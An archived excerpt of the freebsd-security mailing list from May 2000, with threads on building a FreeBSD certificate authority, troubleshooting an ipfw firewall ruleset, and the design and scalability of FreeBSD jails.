(I take no responsibility for URLs which point to MicroSoftHeaded servers)

Note that some (most?) of these offer links which will allow you to install their CA cert in your browser CA database.

IMHO, you're asking the right sort of questions. Ask more of them.

--------------
Duane H.
Hesser
dhh@androcles.com

From owner-freebsd-security Thu May 18 00:55:44 2000
Delivered-To: freebsd-security@freebsd.org
Received: from obie.softweyr.com (obie.softweyr.com [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 8DC1F37B511; Thu, 18 May 2000 00:55:37 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from softweyr.com (homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id BAA15259; Thu, 18 May 2000 01:55:11 -0600 (MDT) (envelope-from wes@softweyr.com)
Message-ID: <3923A26C.2E61D1E1@softweyr.com>
Date: Thu, 18 May 2000 01:57:32 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-STABLE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Garrett Wollman
Cc: Kris Kennaway , Robert Watson , Peter Wemm , security@FreeBSD.org
Subject: Re: HEADS UP: New host key for freefall!
References: <200005171951.PAA15001@khavrinen.lcs.mit.edu>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Garrett Wollman wrote:
>
> < said:
>
> > On Wed, 17 May 2000, Robert Watson wrote:
>
> >> I do agree that we need to do a CA, but as I've mentioned before, we need
> >> to do it *right* or not at all. This means a secure key storage
> >> mechanism/facility, offline signing key, etc, etc. Rather than grow our
> >> own, it might be easier (and more affordable) to sit on someone else's,
> >> unless BSDi has one already?
>
> > Agreed.
>
> I think it's important to consider that the level of effort required
> to implement maximal assurance may not necessarily be appropriate for
> this project. (It certainly isn't appropriate for my organization,
> and we have 500 people on staff and 6 people working full-time on
> {sys,net}admin.)

Right.
Our needs are relatively simple:

o Generate and keep safe a CA key.
o Sign a certificate request for each committer.
o Generate and keep safe a certificate for each "hat".
o Be able to transfer certificates from one person to another when a new head fills a "hat".

> >> Does anyone know anything about inter-cert-format certification?
> >> I.e., can an x.509 PKI root sign PGP keys in a useful way? Is it
> >> usefully verifiable in an automated way?
>
> > In principle this can be done by extracting a PGP key from the X.509
> > certificate since (AFAIK) it contains (can contain) all of the required
> > bits. I'm not sure if something more direct has been standardized, though.
>
> It would be much easier to simply use an X.509 object signing tool to
> sign the canonicalized PGP key, and vice versa. Or, alternatively,
> dispense with one of the technologies entirely. X.509 for
> privacy-enhanced mail appears to be effectively dead, and has been for
> some time.

There is a lot more than email to be considered here. New SSH keys for freefall could be much more easily posted on a secure web page than emailed to the whole world. A simple email indicating the URL of the page would provide notice.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters Softweyr LLC
wes@softweyr.com http://softweyr.com/

From owner-freebsd-security Thu May 18 00:59:36 2000
Delivered-To: freebsd-security@freebsd.org
Received: from obie.softweyr.com (obie.softweyr.com [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 6491737B8AC; Thu, 18 May 2000 00:59:24 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from softweyr.com (homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id BAA15273; Thu, 18 May 2000 01:59:23 -0600 (MDT) (envelope-from wes@softweyr.com)
Message-ID: <3923A366.A309CED9@softweyr.com>
Date: Thu, 18 May 2000 02:01:44 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-STABLE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Kris Kennaway
Cc: security@FreeBSD.ORG, Robert Watson , Darren Reed , Peter Wemm
Subject: Re: HEADS UP: New host key for freefall!
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Kris Kennaway wrote:
>
> On Wed, 17 May 2000, Wes Peters wrote:
>
> > > Now to address Wes's point: I don't believe SSH1 can do certification,
> > > although I don't know about SSH2.
> >
> > Oh, I was referring to certificates for sending S/MIME email.
>
> In theory PKI can do everything [*]: S/MIME email, PGP signatures, signed
> SSH hostkeys so you don't have to explicitly verify the new key through
> out-of-band trusted channels, SSL certificates for secure web services,
> etc. In theory these formats should all be pretty inter-convertible, since
> they all contain "enough crypto" (packaged in different ways) to make a
> decent protocol happy.
>
> > I'm not sure we'll be doing a large enough volume to warrant paying money
> > I guess we'd have to work out a plan for what classes
> > of persons and/or positions we plan to issue keys/certs to in order to
> > answer that question. If we're talking about a CA cert, a cert for each
> > of the "hats", and a cert for each committer individually, that means
> > right now we'd need to manage about 210 certs, of which 5 or 6 need to
> > be transferrable.
>
> The point of a PKI is that you can have a *single* trusted root
> certificate with all others signed by that one in a hierarchy. In order to
> root the tree in something which (e.g.) Netscape browsers will
> automatically understand, we'd need to have at least one key signed by a
> commercial CA (Verisign, Thawte, ..) which is used as the basis for the
> FreeBSD PKI, but there's no inherent need for more than one "purchased"
> certificate.

It is quite simple to add a CA to your browser, I've done it at work several times this week. ;^) Also, there is more than just the browser at stake here; when I finish my work on pkg_add it will be able to accept and verify signed packages. How much checking of the certificate we choose to do is up for grabs.

> > Plus, I really like the idea of a cert with "The FreeBSD Project" as the
> > CA. Are we not the most reliable source of information about FreeBSD?
>
> Certified signatures are not about verifying the information content of
> data, it's about verifying the integrity of the message and the
> authenticity of the signing key.

Exactly.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters Softweyr LLC
wes@softweyr.com http://softweyr.com/

From owner-freebsd-security Thu May 18 01:02:16 2000
Delivered-To: freebsd-security@freebsd.org
Received: from obie.softweyr.com (obie.softweyr.com [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 36DF737B511; Thu, 18 May 2000 01:02:10 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from softweyr.com (homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id CAA15364; Thu, 18 May 2000 02:02:10 -0600 (MDT) (envelope-from wes@softweyr.com)
Message-ID: <3923A40E.904210F3@softweyr.com>
Date: Thu, 18 May 2000 02:04:30 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-STABLE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Kris Kennaway
Cc: Garrett Wollman , security@FreeBSD.ORG, Robert Watson , Darren Reed , Peter Wemm
Subject: Re: HEADS UP: New host key for freefall!
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Kris Kennaway wrote:
>
> We could implement this without too much trouble by shipping the root cert
> on CD with FreeBSD releases (and having some kind of online distribution
> method, perhaps signed by a bunch of PGP keys) and instructing people on
> how to load it into netscape (if it were to be used for https purposes).
> Perhaps we could even make the netscape port pre-load it - we already have
> the infrastructure for customizing netscape prior to use.

Now you're talking.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters Softweyr LLC
wes@softweyr.com http://softweyr.com/

From owner-freebsd-security Thu May 18 06:11:37 2000
Delivered-To: freebsd-security@freebsd.org
Received: from alpha.root-servers.ch (alpha.root-servers.ch [195.49.62.125]) by hub.freebsd.org (Postfix) with SMTP id 97D5F37BDD6 for ; Thu, 18 May 2000 06:11:27 -0700 (PDT) (envelope-from gabriel_ambuehl@buz.ch)
Received: (qmail 13212 invoked from network); 18 May 2000 13:13:17 -0000
Received: from unknown (HELO ATHLON-550) (62.2.99.59) by ns1.root-servers.ch with SMTP; 18 May 2000 13:13:17 -0000
Date: Thu, 18 May 2000 15:12:05 +0200
From: Gabriel Ambuehl
X-Mailer: The Bat! (v1.42 Beta/19) UNREG / CD5BF9353B3B7091
Organization: BUZ Internet Services
X-Priority: 3 (Normal)
Message-ID: <1574492519.20000518151205@buz.ch>
To: freebsd-security@freebsd.org
Subject: ipfw: HTTP(S) is working but everything else doesn't...
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

[I sent this already to -questions but it went unanswered. I surely know how mls are working but some advice couldn't hurt ;-)]

Hello,
my ipfw is driving me nuts. I want to allow SMTP (both incoming and outgoing), POP3, HTTP, HTTPS and DNS (well, FTP should work as well but that one has got its own problems because of that FTP-data thingy) for the firewall box itself and all boxes which use it as gateway [1]. Everything besides this should be rejected.
To accomplish this, I wanted to use the following ruleset:

00100 allow ip from any to any via lo0
00200 deny ip from any to 127.0.0.0/8
00300 allow tcp from any to any established
00400 allow ip from any to any frag
00500 allow tcp from any to any 25 setup
00600 allow udp from any to any 53
00700 allow udp from any 53 to any 53
00800 allow tcp from any to any 80 setup
00900 allow tcp from any to any 443 setup
01000 allow tcp from any to any 21 setup
01100 allow tcp from any to any 110 setup
01200 allow tcp from any to any 22 setup
01300 allow udp from any to any 22
# DHCP, I need this during development phase, it's going to be kicked out in production
01400 allow tcp from any to any 546 setup
01500 allow udp from any to any 546
65535 deny ip from any to any

but this isn't working as expected. HTTP and HTTPS both work as they should. DNS doesn't work at all, neither SMTP nor POP (meaning: I can't connect to the server from outside or to outside servers from the box itself). And the most strange thing (or at least it seems this way to me) is happening with ssh: first, ssh (PuTTY) takes over a minute to show me a login prompt (connecting to the box from outside) and then, when I try to login, I can type without any problems, but as soon as I hit enter, the ssh client exits and the server reports

|sshd[645]: fatal: Timeout before authentication for 10.2.2.150.

What's going wrong here?

[1] Meaning the box acts as some kind of bastion host for the entire net behind it. I know this isn't the optimum but as we can't set up enough of those boxes (supplier ran out of them :-(( it has to offer those services as well.
Best regards,
Gabriel

From owner-freebsd-security Thu May 18 06:27:22 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail3.iadfw.net (mail3.iadfw.net [209.196.123.3]) by hub.freebsd.org (Postfix) with SMTP id 3C28237B654 for ; Thu, 18 May 2000 06:27:18 -0700 (PDT) (envelope-from moby@pcsn.net)
Received: from mobster1 from [205.241.160.67] by mail3.iadfw.net (/\##/\ Smail3.1.30.16 #30.4) with smtp for sender: id ; Thu, 18 May 2000 08:27:11 -0500 (CDT)
Reply-To:
From: "Mobeen Azhar"
To:
Subject: RE: ipfw: HTTP(S) is working but everything else doesn't...
Date: Thu, 18 May 2000 08:27:06 -0500
Message-ID: <000501bfc0cc$c2b3ae00$9ef105ab@TexasCommerce.com>
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0
In-Reply-To: <1574492519.20000518151205@buz.ch>
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I am not exactly sure what's going wrong, but try removing the deny ip from any to 127.0.0.0/8 rule and see what happens. Also, in the beginning of your rules, you need to allow all local traffic. I don't see anything like that in your rules.

--Moby

> -----Original Message-----
> From: owner-freebsd-security@FreeBSD.ORG
> [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Gabriel Ambuehl
> Sent: Thursday, May 18, 2000 0812
> To: freebsd-security@FreeBSD.ORG
> Subject: ipfw: HTTP(S) is working but everything else doesn't...
>
>
> [I sent this already to -questions but it went unanswered. I surely
> know how mls are working but some advice couldn't hurt ;-)]
> Hello,
> my ipfw is driving me nuts.
> I want to allow SMTP (both incoming and
> outgoing), POP3, HTTP, HTTPS and DNS (well, FTP should work as well
> but that one has got its own problems because of that FTP-data thingy)
> for the firewall box itself and all boxes which use it as gateway [1].
> Everything besides this should be rejected. To accomplish this, I
> wanted to use the following ruleset:
> 00100 allow ip from any to any via lo0
> 00200 deny ip from any to 127.0.0.0/8
> 00300 allow tcp from any to any established
> 00400 allow ip from any to any frag
> 00500 allow tcp from any to any 25 setup
> 00600 allow udp from any to any 53
> 00700 allow udp from any 53 to any 53
> 00800 allow tcp from any to any 80 setup
> 00900 allow tcp from any to any 443 setup
> 01000 allow tcp from any to any 21 setup
> 01100 allow tcp from any to any 110 setup
> 01200 allow tcp from any to any 22 setup
> 01300 allow udp from any to any 22
> # DHCP, I need this during development phase, it's going to be
> kicked out in production
> 01400 allow tcp from any to any 546 setup
> 01500 allow udp from any to any 546
> 65535 deny ip from any to any
>
> but this isn't working as expected. HTTP and HTTPS both work as they
> should. DNS doesn't work at all, neither SMTP nor POP (meaning: I
> can't connect to the server from outside or to outside servers from
> the box itself). And the most strange thing (or at least it seems
> this way to me) is happening with ssh: first, ssh (PuTTY) takes
> over a minute
> to show me a login prompt (connecting to the box from outside) and
> then, when I try to login, I can type without any problems, but as
> soon as I hit enter, the ssh client exits and the server reports
> |sshd[645]: fatal: Timeout before authentication for 10.2.2.150.
> What's going wrong here?
>
> [1] Meaning the box acts as some kind of bastion host for the entire
> net behind it.
> I know this isn't the optimum but as we can't set up enough
> of those boxes (supplier ran out of them :-(( it has to offer those
> services as well.
>
>
> Best regards,
> Gabriel

From owner-freebsd-security Thu May 18 06:43:30 2000
Delivered-To: freebsd-security@freebsd.org
Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 2CD6E37B69C for ; Thu, 18 May 2000 06:43:26 -0700 (PDT) (envelope-from fpscha@ns1.via-net-works.net.ar)
Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id KAA22457; Thu, 18 May 2000 10:35:46 -0300 (GMT)
From: Fernando Schapachnik
Message-Id: <200005181335.KAA22457@ns1.via-net-works.net.ar>
Subject: Re: ipfw: HTTP(S) is working but everything else doesn't...
In-Reply-To: <1574492519.20000518151205@buz.ch> from Gabriel Ambuehl at "May 18, 0 03:12:05 pm"
To: gabriel_ambuehl@buz.ch (Gabriel Ambuehl)
Date: Thu, 18 May 2000 10:35:46 -0300 (GMT)
Cc: freebsd-security@FreeBSD.ORG
Reply-To: Fernando Schapachnik
X-Mailer: ELM [version 2.4ME+ PL40 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In an earlier message, Gabriel Ambuehl wrote:
> my ipfw is driving me nuts. I want to allow SMTP (both incoming and
> outgoing), POP3, HTTP, HTTPS and DNS (well, FTP should work as well
> but that one has got its own problems because of that FTP-data thingy)
> for the firewall box itself and all boxes which use it as gateway [1].

You can try tcpdumping the interfaces to see what you get.
Also, you can try adding a deny log rule at the bottom to see what gets dropped by the firewall.

Good luck!

Fernando P. Schapachnik
Network Administration
VIA NET.WORKS ARGENTINA S.A.
fernando@via-net-works.net.ar
(54-11) 4323-3333

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu May 18 7: 5: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from adm.sci-nnov.ru (adm.sci-nnov.ru [195.122.226.2]) by hub.freebsd.org (Postfix) with ESMTP id 003EB37BC69 for ; Thu, 18 May 2000 07:04:56 -0700 (PDT) (envelope-from vlad@sandy.ru) Received: from anonymous.sandy.ru (anonymous.sandy.ru [195.122.226.40]) by adm.sci-nnov.ru (8.9.3/Dmiter-4.1) with ESMTP id RAA09067; Thu, 18 May 2000 17:50:27 +0400 (MSD) Date: Thu, 18 May 2000 17:50:29 +0400 From: Vladimir Dubrovin X-Mailer: The Bat! (v1.41) Reply-To: Vladimir Dubrovin Organization: Sandy Info X-Priority: 3 (Normal) Message-ID: <11743.000518@sandy.ru> To: Gabriel Ambuehl Cc: freebsd-security@freebsd.org Subject: Re: ipfw: HTTP(S) is working but everything else doesn't... In-reply-To: <1574492519.20000518151205@buz.ch> References: <1574492519.20000518151205@buz.ch> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Hello Gabriel Ambuehl,

You've missed

  allow udp from any 53 to any

same thing with other UDPs. In fact it's better to configure

  allow udp from any 1024-65535,53 to any 53
  allow udp from any 53 to any 1024-65535

because otherwise all your network is open to any UDP attack with source port 53.

18.05.00 17:12, you wrote: ipfw: HTTP(S) is working but everything else doesn't...;

G> [I sent this already to -questions but it went unanswered. I surely
G> know how mls are working but some advice couldn't hurt ;-)]
G> Hello,
G> my ipfw is driving me nuts.
G> I want to allow SMTP (both incoming and
G> outgoing), POP3, HTTP, HTTPS and DNS (well, FTP should work as well
G> but that one has got its own problems because of that FTP-data thingy)
G> for the firewall box itself and all boxes which use it as gateway [1].
G> Everything besides this should be rejected. To accomplish this, I
G> wanted to use the following ruleset:
G> 00100 allow ip from any to any via lo0
G> 00200 deny ip from any to 127.0.0.0/8
G> 00300 allow tcp from any to any established
G> 00400 allow ip from any to any frag
G> 00500 allow tcp from any to any 25 setup
G> 00600 allow udp from any to any 53
G> 00700 allow udp from any 53 to any 53
G> 00800 allow tcp from any to any 80 setup
G> 00900 allow tcp from any to any 443 setup
G> 01000 allow tcp from any to any 21 setup
G> 01100 allow tcp from any to any 110 setup
G> 01200 allow tcp from any to any 22 setup
G> 01300 allow udp from any to any 22
G> # DHCP, I need this during development phase, it's going to be kicked out in production
G> 01400 allow tcp from any to any 546 setup
G> 01500 allow udp from any to any 546
G> 65535 deny ip from any to any
G> but this isn't working as expected. HTTP and HTTPS both work as they
G> should. DNS doesn't work at all, neither SMTP nor POP (meaning: I
G> can't connect to the server from outside or to outside servers from
G> the box itself). And the strangest thing (or at least it seems
G> that way to me) is happening with ssh: first, ssh (PuTTY) takes over a minute
G> to show me a login prompt (connecting to the box from outside) and
G> then, when I try to login, I can type without any problems, but as
G> soon as I hit enter, the ssh client exits and the server reports
G> |sshd[645]: fatal: Timeout before authentication for 10.2.2.150.
G> What's going wrong here?
G> [1] Meaning the box acts as some kind of bastion host for the entire
G> net behind it.
G> I know this isn't the optimum but as we can't set up enough
G> of those boxes (supplier ran out of them :-(( it has to offer those
G> services as well.
G> Best regards,
G> Gabriel
G> Best regards,
G> Gabriel
G> To Unsubscribe: send mail to majordomo@FreeBSD.org
G> with "unsubscribe freebsd-security" in the body of the message

+=-=-=-=-=-=-=-=-=+ |Vladimir Dubrovin| Sandy, ISP | Sandy CSS chief | Customers Support Service dept http://www.sandy.ru Nizhny Novgorod, Russia +=-=-=-=-=-=-=-=-=+ http://www.security.nnov.ru

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu May 18 7:28:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from vidle.i.cz (vidle.i.cz [193.179.36.138]) by hub.freebsd.org (Postfix) with ESMTP id C650537BEED for ; Thu, 18 May 2000 07:28:26 -0700 (PDT) (envelope-from mm@i.cz) Received: from ns.i.cz (brana.i.cz [193.179.36.134]) by vidle.i.cz (Postfix) with ESMTP id 304D630743 for ; Thu, 18 May 2000 15:07:03 +0200 (CEST) Received: from woody.i.cz (woody.i.cz [192.168.18.29]) by ns.i.cz (Postfix) with ESMTP id 6FB5F36405 for ; Thu, 18 May 2000 15:04:22 +0200 (CEST) Content-Length: 424 Message-ID: X-Mailer: XFMail 1.3 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=iso-8859-2 Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <200005171951.PAA15001@khavrinen.lcs.mit.edu> Date: Thu, 18 May 2000 15:04:22 +0200 (MET DST) Reply-To: mm@i.cz From: Martin Machacek To: security@FreeBSD.org Subject: Re: HEADS UP: New host key for freefall! Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On 17-May-00 Garrett Wollman wrote:
> Perhaps all the FreeBSD people are using either 2.6.2 or GnuPG, so
> they really don't care whether the commercial product exists or not.
> I use GnuPG, personally, since then I don't have to worry about any
> licensing issues at all.
I'm using the Linux version of PGP 6.5.2 on FreeBSD 3.3 without any problems. Maybe that's another reason ...

Martin
---
[PGP KeyID F3F409C4]

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu May 18 7:39:18 2000 Delivered-To: freebsd-security@freebsd.org Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id 275D737B69F for ; Thu, 18 May 2000 07:39:10 -0700 (PDT) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.9.3/8.9.3) id KAA64312; Thu, 18 May 2000 10:39:00 -0400 (EDT) (envelope-from cjc) Date: Thu, 18 May 2000 10:39:00 -0400 From: "Crist J. Clark" To: Gabriel Ambuehl Cc: freebsd-security@FreeBSD.ORG Subject: Re: ipfw: HTTP(S) is working but everything else doesn't... Message-ID: <20000518103900.A64244@cc942873-a.ewndsr1.nj.home.com> Reply-To: cjclark@home.com References: <1574492519.20000518151205@buz.ch> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <1574492519.20000518151205@buz.ch>; from gabriel_ambuehl@buz.ch on Thu, May 18, 2000 at 03:12:05PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Thu, May 18, 2000 at 03:12:05PM +0200, Gabriel Ambuehl wrote:
> [I sent this already to -questions but it went unanswered. I surely
> know how mls are working but some advice couldn't hurt ;-)]
> Hello,
> my ipfw is driving me nuts. I want to allow SMTP (both incoming and
> outgoing), POP3, HTTP, HTTPS and DNS (well, FTP should work as well
> but that one has got its own problems because of that FTP-data thingy)
> for the firewall box itself and all boxes which use it as gateway [1].
> Everything besides this should be rejected.
> To accomplish this, I
> wanted to use the following ruleset:
> 00100 allow ip from any to any via lo0
> 00200 deny ip from any to 127.0.0.0/8
> 00300 allow tcp from any to any established
> 00400 allow ip from any to any frag
> 00500 allow tcp from any to any 25 setup
> 00600 allow udp from any to any 53
> 00700 allow udp from any 53 to any 53
> 00800 allow tcp from any to any 80 setup
> 00900 allow tcp from any to any 443 setup
> 01000 allow tcp from any to any 21 setup
> 01100 allow tcp from any to any 110 setup
> 01200 allow tcp from any to any 22 setup
> 01300 allow udp from any to any 22
> # DHCP, I need this during development phase, it's going to be kicked out in production
> 01400 allow tcp from any to any 546 setup
> 01500 allow udp from any to any 546
> 65535 deny ip from any to any
>
> but this isn't working as expected. HTTP and HTTPS both work as they
> should. DNS doesn't work at all, neither SMTP nor POP (meaning: I
> can't connect to the server from outside or to outside servers from
> the box itself). And the strangest thing (or at least it seems
> that way to me) is happening with ssh: first, ssh (PuTTY) takes over a minute
> to show me a login prompt (connecting to the box from outside) and
> then, when I try to login, I can type without any problems, but as
> soon as I hit enter, the ssh client exits and the server reports
> |sshd[645]: fatal: Timeout before authentication for 10.2.2.150.
                                                       ^^^^^^^^^^

I doubt this is the problem, but I just want to check. Is this gateway also doing NAT?

> What's going wrong here?

Try the suggestion of logging some of those rules.

-- Crist J.
Clark cjclark@home.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 7:41: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 5993737B6E7 for ; Thu, 18 May 2000 07:40:59 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id KAA29187; Thu, 18 May 2000 10:40:40 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Thu, 18 May 2000 10:40:39 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Don Lewis Cc: Geoffrey Robinson , security@FreeBSD.ORG Subject: Re: Jail: Problems? Proper Usage? Status? Practicality? In-Reply-To: <200005172153.OAA01533@salsa.gv.tsc.tdk.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 17 May 2000, Don Lewis wrote: > On May 16, 1:05pm, Robert Watson wrote: > > ... > > } > Finally how secure is jail really? I'm aware of a trivial chroot breakout > } > technique. Does that hole still exist? Are there any other known holes? Is > } > jail still under active development? Is it worth the trouble to do any of > } > this? > > } Right now my efforts are primarily aimed at improving the security > } abstractions within the kernel relating to the TrustedBSD project--this > } should have a side benefit of improving the relationship between jail() > } and the base OS, making Jail easier to maintain and modify. > > I think this is also the right thing to do. I would go so far as to > deprecate the jail(2) syscall, and implement jail(8) in terms of > the syscalls to set up the virtual network interfaces, the syscalls > to set the process capabilities, and chroot(). I tend to agree. 
I'm currently working on a design document for a modular kernel policy mechanism that would allow pluggable and extendable security policies, including the capability-limitations associated with Jail. I should be posting a first draft to trustedbsd-discuss and freebsd-security in a couple of days. This would be distinct from virtualization and namespace services, but would be responsible for preventing changes to the virtualization/namespace after it was created and appropriate process properties were configured. Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 7:45:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from alpha.root-servers.ch (alpha.root-servers.ch [195.49.62.125]) by hub.freebsd.org (Postfix) with SMTP id 06BBA37B5DA for ; Thu, 18 May 2000 07:45:39 -0700 (PDT) (envelope-from gabriel_ambuehl@buz.ch) Received: (qmail 13863 invoked from network); 18 May 2000 14:47:34 -0000 Received: from unknown (HELO ATHLON-550) (62.2.99.59) by ns1.root-servers.ch with SMTP; 18 May 2000 14:47:34 -0000 Date: Thu, 18 May 2000 16:46:21 +0200 From: Gabriel Ambuehl X-Mailer: The Bat! (v1.42 Beta/19) UNREG / CD5BF9353B3B7091 Organization: BUZ Internet Services X-Priority: 3 (Normal) Message-ID: <1105383811.20000518164621@buz.ch> To: freebsd-security@freebsd.org Subject: Re: ipfw: HTTP(S) is working but everything else doesn't...[SOLVED] Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, just wanted to thank all of you for your help. It's working now and I now also got the idea why SSH didn't work as it should. Thanks very much, again. 
Best regards, Gabriel To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 18 7:47:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 6489937B5D8 for ; Thu, 18 May 2000 07:47:08 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id KAA29232; Thu, 18 May 2000 10:47:03 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Thu, 18 May 2000 10:47:03 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Geoffrey Robinson Cc: security@freebsd.org Subject: Re: Jail: Problems? Proper Usage? Status? Practicality? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 17 May 2000, Geoffrey Robinson wrote: > On Wed, 17 May 2000, Robert Watson wrote: > > > Jail works by: > > > > 1) Chrooting the child process > > 2) Limiting the scope of superuser privileges accessible by uid0 processes > > in the jail > > > > It does not attempt to prevent processes outside the jail from > > communicating with processes within the jail. As such, having a process > > do so wouldn't defeat the jail per se, but would defeat the purpose of the > > jail :-). > > Still, like any network service the security impact would depend on how > well the server application was written not on the fact you have a link to > the host system. Right? The point of jail() is to limit the scope of compromise, if any, to within the jail. As such, the integrity of a jail should rest with the applications that run in it, but the integrity of the host should not. 
I.e., one of the intended environments for jail use is a delegation model wherein virtual subsystems are provided to individuals/groups/organizations for their own management. By virtue of the jail'd file system being a subset of the host file system, communication is possible between jails and the host (as well as signal delivery, et al), but any such communication should have to be initiated by processes outside the jail, not from within.

> > One way to substantially improve jail scalability would be to allow the
> > same (read-only) file system to be present in all jails as the root, with
> > only jail-local data being modified. You can imagine gratuitously using
> > nullfs (if it worked) to do this, and mount per-jail writable fs's for
> > appropriate subdirectories (/etc, /usr/local, /home) with appropriate
> > symlinks within the jail. Right now, each jail costs you the size of
> > world, and is hard to upgrade if you have any decent number of jails.
> > Storing all that stuff in a single tree mapped read-only into jails would
> > solve that (you'd probably want two so you could upgrade one, test it, and
> > then swap to that for all jails so as to minimize downtime).
>
> If I wanted to do that, would it be as easy as building a jail on a
> spare partition then mounting it read-only to the correct locations?

